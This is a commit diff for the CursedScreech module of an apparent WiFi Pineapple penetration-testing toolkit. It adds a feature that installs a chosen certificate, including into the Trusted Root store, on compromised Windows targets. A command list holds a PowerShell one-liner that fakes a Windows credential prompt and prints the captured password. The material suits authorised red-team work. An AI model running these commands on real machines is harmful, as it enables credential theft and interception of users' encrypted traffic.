hak5/nano-tetra-modules
1
0
Fork 0
mirror of https://github.com/hak5/nano-tetra-modules.git synced 2025-10-29 16:58:09 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 1.3

Browse Source
This commit is contained in:
sud0nick
2018-01-05 23:07:00 -05:00
parent a645065efc
commit 78163214eb
8 changed files with 81 additions and 15 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
CursedScreech/api/module.php
View File

@@ -422,7 +422,7 @@ class CursedScreech extends Module {
$files = scandir(__API_DL__);
$success = true;
foreach ($files as $file) {
if ($file == "." || $file == "..") {continue;}
if (substr($file, 0, 1) == ".") {continue;}
if (!unlink(__API_DL__ . $file)) {
$success = false;
}
@@ -449,7 +449,7 @@ class CursedScreech extends Module {
$files = [];
foreach (scandir(__PAYLOADS__) as $file) {
if ($file == "." || $file == "..") {continue;}
if (substr($file, 0, 1) == ".") {continue;}
$files[$file] = __PAYLOADS__;
}
$this->respond(true, null, $files);
@@ -521,7 +521,7 @@ class CursedScreech extends Module {
$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
$contents = array();
foreach (scandir($dir) as $log) {
if ($log == "." || $log == "..") {continue;}
if (substr($log, 0, 1) == ".") {continue;}
array_push($contents, $log);
}
$this->respond(true, null, $contents);
@@ -575,7 +575,7 @@ class CursedScreech extends Module {
$keys = scandir($dir);
$certs = array();
foreach ($keys as $key) {
if ($key == "." || $key == "..") {continue;}
if (substr($key, 0, 1) == ".") {continue;}
$parts = explode(".", $key);
$fname = $parts[0];

5
CursedScreech/includes/changelog/Version 1.3 Normal file
View File

@@ -0,0 +1,5 @@
January 5, 2018
<br /><br />
- Modified hook into Papers to work with the latest release<br />
- Added ability to install a certificate on a target Windows machine<br />

1
CursedScreech/includes/forest/ezcmds
View File

@@ -1,4 +1,5 @@
Send File:C:\Temp\
Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store"
Get PS Version:powershell "$PSVersionTable"
Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"

2
CursedScreech/includes/forest/target.py
View File

@@ -14,7 +14,7 @@ with open(settingsFile, "r") as sFile:
if params[0] == "activity_log":
activity_log = params[1]
elif params[0] == "kuro_key":
priv_key = params[1] + ".pem"
priv_key = params[1] + ".key"
pub_cer = params[1] + ".cer"
elif params[0] == "target_key":
client_key = params[1] + ".cer"

2
CursedScreech/includes/scripts/testEncrypt.sh
View File

@@ -23,7 +23,7 @@ while [ "$#" -gt 0 ]
do
if [[ "$1" == "-k" ]]; then
KEY="$2.pem"
KEY="$2.key"
fi
if [[ "$1" == "-d" ]]; then
KEYDIR="$2"

55
CursedScreech/js/module.js
View File

@@ -51,6 +51,22 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
$scope.newCmdName = "";
$scope.newCmdCommand = "";
$scope.checkAllTargets = false;
$scope.target_installKey = "";
$scope.certStores = [
{"ID":"Root", "Name":"Trusted Root Certification Authorities"},
{"ID":"My", "Name":"Personal"},
{"ID":"Remote Desktop", "Name":"Remote Desktop"},
{"ID":"Trust", "Name":"Enterprise Trust"},
{"ID":"CA", "Name":"Intermediate Certification Authorities"},
{"ID":"SmartCardRoot", "Name":"Smart Card Trusted Roots"},
{"ID":"TrustedPublisher", "Name":"Trusted Publishers"},
{"ID":"TrustedPeople", "Name":"Trusted People"},
{"ID":"ClientAuthIssuer", "Name":"Client Authentication Issuers"},
{"ID":"eSIM Certification Authorities", "Name":"eSIM Certification Authorities"},
{"ID":"Windows Live ID Token Issuer", "Name":"Windows Live ID Token Issuer"},
{"ID":"Homegroup Machine Certificates", "Name":"Homegroup Machine Certificates"}
];
$scope.selectedCertStore = $scope.certStores[0];
// Panes
$scope.showTargetPane = true;
@@ -62,6 +78,7 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
$scope.uploading = false;
$scope.selectedPayload = "";
$scope.showPayloadSelect = false;
$scope.showCertSelect = false;
// Interval vars
$scope.stop;
@@ -313,6 +330,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
if ($scope.showPayloadSelect) {
// ex: "sendfile;/pineapple/modules/CursedScreech/includes/payloads/NetCli.exe;C:\Temp\"
cmd = "sendfile;" + $scope.payloadDir + $scope.selectedPayload.fileName + ";" + $scope.targetCommand;
} else if ($scope.showCertSelect) {
cmd = "sendfile;" + $scope.target_installKey + ";" + getEZCmd("Send File");
} else {
cmd = $scope.targetCommand;
}
@@ -321,7 +340,23 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
action: 'sendCommand',
command: cmd,
targets: checkedTargets
},function(response){});
},function(response){
// Make a second API call to install the certificate
if ($scope.showCertSelect) {
cmd = $scope.targetCommand.replace("$cert", getEZCmd("Send File") + $scope.target_installKey.split("/").slice(-1)[0]).replace("$store", "'Cert:\\LocalMachine\\" + $scope.selectedCertStore.ID + "'")
$api.request({
module: 'CursedScreech',
action: 'sendCommand',
command: cmd,
targets: checkedTargets
},function(response){});
}
});
});
function getTargetIndex(sock){
@@ -458,23 +493,27 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
});
$scope.ezCommandChange = (function(){
$scope.showPayloadSelect = false;
$scope.showCertSelect = false;
if ($scope.selectedCmd === null) {
$scope.targetCommand = "";
$scope.showPayloadSelect = false;
return;
}
for (key in $scope.ezcmds) {
if ($scope.ezcmds[key] == $scope.selectedCmd) {
if (key == "Send File") {
$scope.showPayloadSelect = true;
} else {
$scope.showPayloadSelect = false;
} else if (key == "Install Cert") {
$scope.showCertSelect = true;
}
}
}
$scope.targetCommand = $scope.selectedCmd;
});
function getEZCmd(key) {
return $scope.ezcmds[key];
}
/* ============================================= */
/* BEGIN KEY FUNCTIONS */
@@ -484,9 +523,15 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
if (type == "kuro") {
$scope.selectKuroKey = true;
$scope.selectTargetKey = false;
$scope.selectInstallKey = false;
} else if (type == "target") {
$scope.selectTargetKey = true;
$scope.selectKuroKey = false;
$scope.selectInstallKey = false;
} else if (type == "install") {
$scope.selectInstallKey = true;
$scope.selectKuroKey = false;
$scope.selectTargetKey = false;
}
$api.request({
module: 'CursedScreech',
@@ -509,6 +554,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
$scope.settings_kuroKey = keyPath;
} else if ($scope.selectTargetKey == true) {
$scope.settings_targetKey = keyPath;
} else if ($scope.selectInstallKey == true) {
$scope.target_installKey = keyPath + ".cer";
}
});

19
CursedScreech/module.html
View File

@@ -234,14 +234,27 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
<option value="" selected>Select...</option>
</select>
<br />
<div ng-show="showPayloadSelect">
<div ng-show="showPayloadSelect" ng-hide="!showPayloadSelect">
<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedPayload" ng-options="payload.fileName for payload in payloads">
<option value="" disabled selected>Select Payload...</option>
</select>
<br />
<h4>Remote upload path</h4>
</div>
<input type="text" ng-model="targetCommand" class="form-control block" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
<div ng-show="showCertSelect" ng-hide="!showCertSelect">
<div class="row form-group">
<div class="col-md-6">
<input type="text" ng-model="target_installKey" class="form-control" placeholder="Select Certificate...">
</div>
<div class="col-md-2">
<button type="button" class="btn btn-sm" data-toggle="modal" data-target="#cs_keyModal" ng-click="loadCertificates('install');">SSL Store</button>
</div>
</div>
<h4>Certificate Store</h4>
<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedCertStore" ng-options="store.Name for store in certStores">
</select>
</div>
<input type="text" ng-model="targetCommand" class="form-control block" ng-show="!showCertSelect" ng-hide="showCertSelect" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
<table style="width: 100%">
<tr><td>
<button type="button" class="btn btn-sm cs_hoverInfo" style="width: 100px;" ng-disabled="kuroButton=='Start'" ng-click="sendCommand();">Send</button>
@@ -397,7 +410,7 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
<tbody>
<tr ng-repeat="(key, value) in ezcmds">
<td>
<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File' || key == 'Install Cert'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
</td>
<td style="width: 200px">
<label class="form-label">{{ key }}</label>

4
CursedScreech/module.info
View File

@@ -6,5 +6,5 @@
"tetra"
],
"title": "CursedScreech",
"version": "1.2"
}
"version": "1.3"
}